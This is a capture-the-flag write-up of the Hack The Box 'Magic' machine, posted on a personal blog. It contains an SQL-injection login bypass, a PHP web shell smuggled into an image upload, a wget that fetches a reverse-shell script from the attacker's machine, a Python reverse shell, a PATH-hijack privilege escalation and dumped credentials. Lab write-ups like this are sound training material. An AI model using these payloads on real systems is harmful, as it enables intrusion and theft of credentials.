23rd November 2020
Hack The Box Magic Machine Info

Hack The Box – Magic – 10.10.10.185

Any sufficiently advanced technology is indistinguishable from magic.

Arthur C. Clarke

About Magic

In this post, I’m writing a write-up for the machine Magic from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Magic is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag your points will be raised by 30.

Foothold
After I found that there is a webserver running on the HTTP port 80, I checked the website hosted on this webserver and found that the login page is vulnerable for SQL injection. After logging in on the web portal I’m able to upload images. With Burp Suite I was able to modify the request of the upload and embedded a shellcode into the image and gain access as www-data with a Reverse Shell.

User
In the root folder of the web server, I found the db.php5 fil with credentials. As te MySQL client isn’t installed on the server, I’m not able to make a connection to the database with these credentials. After further searching, I found some MySQL programs in the ‘/usr/bin’ folder. With the program mysqldump I’ve dumped the database ‘Magic’ which contains the login credentials for the user ‘theseus’.

Root
After running LinEnum.sh I found that the program sysinfo is installed on this box, which is running in the root context. With privilege escalation using PATH variable, I was able to get a reverse shell to my machine and root this box.

Are you ready to see some magic?

Machine Info

Hack The Box Magic Machine Info
Machine Info
Hack The Box Magic Machine IP and machine maker
Machine IP and machine maker

Recon

Port scan

As always I start this box with a Nmap port scan.

~$ nmap -sC -sV -oA ./nmap/magic.txt 10.10.10.185

The results of the port scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 15:01 EDT
Nmap scan report for 10.10.10.185
Host is up (0.053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

There are only two open ports.

  1. 22/tcp (SSH)
  2. 80/tcp (HTTP)

Enumeration web server

I start with the enumeration of the web server and visited the web page http://10.10.10.185. I’m landing on a web page, which has the ability to upload images. It seems to be an image hosting website.

Hack The Box Magic HTTP port 80
http://10.10.10.185

On the left side at the bottom of this web page there is a logon button. This button redirects me to a login form.

Hack The Box Magic login form
http://10.10.10.185/login.php

After some trying, I’m able to login with this username and password

username: ' or 1=1 --
password: ' or 1=1 --

I’m now able to upload images.

Hack The Box Magic upload image
http://10.10.10.185/upload.php

Gaining Access

Modify HTTP Post request on upload

I can now upload files, I tried to upload a PHP file, but that’s not gonna work. The server only allows image files to be uploaded. I need to fool the request. I use Burpsuite for this one. I like rabbits, so I take a nice rabbit picture. Downloaded a random PNG-file from Google and uploaded the file to the server. I intercepted the upload request and modified this request.

First, I changed the filename from myrabbit.png to myrabbit.php.png, this is line 8 in the image below. At the end of the header, I added my shellcode and removed the body. This is line 35 in the image.

<?php echo system($_REQUEST['shell']); ?>
Hack The Box Magic upload image burpsuite request
HTTP POST request in Burp Suite after the modification

After that, the image was uploaded I navigate the URL-bar to ‘http://10.10.10.185/uploads/myrabbit.php.png?shellcode=whoami’. I’ve now executed the command ‘whoami’ through the uploaded shellcode and the command got’s executed.

Hack The Box Magic Shellcode
HTTP://10.10.10.185/uploads/myrabbit.php.png?shellcode=whoami

Reverse shell as www-data

I can now download, through the shellcode, my PHP-file which contains the reverse shell command to my machine, with: ‘http://10.10.10.185/images/uploads/myrabbit.php.png?shell=wget 10.10.10.14.42:8000/php-reverse-shell.php’, after the PHP-file is downloaded I executed this file with: ‘http://10.10.10.185/images/uploads/myrabbit.php.png?shell=php -f php-reverse-shell.php’. I got a reverse shell as the user www-data.

~$ whoami
www-data

I invoked the command to upgrade the shell.

~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
[email protected]$

I have now an upgraded shell and can start the enumeration to get the user. From this point, I can start my reconnaissance to get the user flag. I start by enumerating the users on this box. In the home folder, I found that there is another user account listed on this box.

home$ ls
theseus

I found the file ‘db.php5’ file on the location ‘www/Magic’ with the username theseus and the password iamkingtheseus. This are credentials for the MySQL database. With this credentials I can make a connection to this database and dump the MySQL database.

[email protected]:/tmp$ /usr/bin/mysqldump --databases Magic --user=theseus --password=iamkingtheseus > dump.sql

I got the credentials.

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET [email protected]_TIME_ZONE */;

/*!40101 SET [email protected]_SQL_MODE */;
/*!40014 SET [email protected]_FOREIGN_KEY_CHECKS */;
/*!40014 SET [email protected]_UNIQUE_CHECKS */;
/*!40101 SET [email protected]_CHARACTER_SET_CLIENT */;
/*!40101 SET [email protected]_CHARACTER_SET_RESULTS */;
/*!40101 SET [email protected]_COLLATION_CONNECTION */;
/*!40111 SET [email protected]_SQL_NOTES */;

-- Dump completed on 2020-04-22 14:18:50

Switch to the user theseus.

[email protected]:/tmp$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng

[email protected]:~$ whoami
whoami
theseus
[email protected]:~$ ls
ls
Desktop    Downloads  Pictures Templates  Videos
Documents  Music      Public   user.txt
[email protected]:~$ cat user.txt
cat user.txt
eb0041b0dddb7b8610cb79e0fff91cb0
[email protected]:~$ 

Privilege escalation

Privilege Escalation using PATH variable

After I got the user flag I checked further on this machine with LinEnum.sh. I downloaded this script from my machine to this box and run the LinEnum.sh script. In the results, I found that /bin/sysinfo is installed on this machine.

[email protected]:~/Desktop$ bash LinEnum.sh
[-] SGID files:
...
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/7917/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /snap/core/7917/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/7917/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Oct  1  2019 /snap/core/7917/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/7917/usr/sbin/pppd
-rwsr-xr-x 1 root root 26696 Jan  8 10:31 /bin/umount
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
-rwsr-xr-x 1 root root 43088 Jan  8 10:31 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
...

The ‘bin’ directory is where all the executable programs are stored. The program ‘sysinfo’ does not comes pre-installed with Ubuntu. It is a custom program that is installed manually. When I run this program I can see all of the hardware information of this machine.

As this program is running in the root context, this can be a way to gain root privileges. I need only to find a way how I can exploit sysinfo. I started Googling and found an article from hackingarticles.in about how to gain privilege escalation using the PATH variable.

I need to get the pieces together. I asked one of my contacts from Hack The Box if he could help be putting the pieces together. And, so he would. He advised me to create a file lshw and place it in the directory /tmp/payload and then changing the PATH variable.

And so I did. I created the file with the reverse shell.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.39",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I dropped this file in the /tmp/payload folder and set the permissions.

[email protected]:/tmp/payload$ chmod 775 lshw

Changed the PATH variable.

export PATH=/tmp/payload:$PATH export PATH=/tmp/payload:$PATH

Started a reverse shell listener on my box. And then the moment of truth… I invoked this command.

[email protected]:/tmp/payload$ /bin/sysinfo

And the reverse shell is established! Bingo, I can now get the root flag and take a beer.

[email protected]:/home/htb/boxes/machines/magic/http$ nc -lvp 6666                                                                                                                                                                       
Ncat: Version 7.80 ( https://nmap.org/ncat )                                                                       
Ncat: Listening on :::6666                                                                                         
Ncat: Listening on 0.0.0.0:6666                                                                                    
Ncat: Connection from 10.10.10.185.                                                                                
Ncat: Connection from 10.10.10.185:39596.                                                                          
# whoami                                                                                                           
root                                                                                                               
# id  
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
# ls
lshw
# pwd
/tmp/payload
# cd /root
# cat root.txt
d940dcff8146f4a3764d9f069541f368

Did you enjoy this write-up as much as I did writing it? Consider giving a respect point, my profile at Hack The Box: https://www.hackthebox.eu/home/users/profile/224856, Thanks in advance!

This blog is completely free of advertisements. Please consider buying me a coffee. Thanks!!

Buy me a coffeeBuy me a coffee

Happy Hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *